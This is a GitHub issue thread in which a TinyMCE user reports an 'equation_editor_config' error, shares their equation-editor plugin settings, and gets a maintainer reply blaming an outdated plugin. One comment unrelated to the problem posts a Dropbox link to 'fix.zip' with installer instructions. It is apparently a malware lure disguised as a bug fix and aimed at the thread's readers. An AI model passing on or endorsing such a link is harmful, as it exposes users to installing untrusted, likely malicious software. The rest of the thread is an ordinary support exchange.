### ISSUE TITLE
Cannot read properties of undefined (reading 'equation_editor_config')

### ISSUE THREAD

**Issue by vinhabubu** [tinymce/tinymce#9841]
## 📝 Provide detailed reproduction steps (if any)
Please provide the steps to reproduce and if possible a minimal demo of the problem via [fiddle.tiny.cloud](https://fiddle.tiny.cloud) or similar.

1.  When use TinyMce, i get error. I clear all equation_editor_config but still get error same. How to fix that
<img width="1346" alt="Screenshot 2024-08-26 at 10 00 11" src="https://github.com/user-attachments/assets/520912f5-a13f-4329-8b69-5356a562786f">

2. equation_editor_config: {
          url: '/public/tinymce/plugins/equation-editor/editor/equation_editor.html',
          // url: '../../public/tinymce/plugins/equation-editor/editor/equation_editor.html',

          origin:
            typeof document !== 'undefined' ? document?.location?.origin : '',
          title: 'Equation Editor',
          width: screenWidth() * 0.8,
          height: screenHeight() * 0.8,
          space_after_content: '&nbsp;',
          btn_cancel_text: 'Hủy',
          btn_ok_text: 'Thêm',
          mathlive_config: {
            // "inline-math": use inline math mode
            // "math": use the display math mode
            // "text": use the text mode |
            defaultMode: 'math',
            // automatically remove extra parentheses around a numerator or denominator
            removeExtraneousParentheses: true,
            // maximum levels of subscript or superscript. Set it to 0 to prevent the input of superscript and subscripts
            scriptDepth: 0,
            // automatically convert parentheses to \left...\right markup
            smartFence: true,
            // switch to text mode when text input is detected, for example when typing “if x > 0”
            smartMode: true,
            // automatically move out of a superscript when a digit is typed
            smartSuperscript: true,
          },
        }

### ✔️ Expected result
*What is the expected result of the above steps?*

### ❌ Actual result
*What is the actual result of the above steps?*

### ❓ Possible solution
*If you have ideas, you can list them here. Otherwise, you can delete this section.*

## 📃 Other details
- Browser: …
- OS: …
- First affected version: …
- Worked in version: …

---

If you'd like to see this fixed sooner, add a 👍 reaction to this post.

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by vinhabubu** [comment]
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

i cannot access link

**Comment by TheSpyder** [comment]
This looks like an old plugin that hasn't been updated to support the latest TinyMCE changes. Please contact the plugin author for help with this issue.
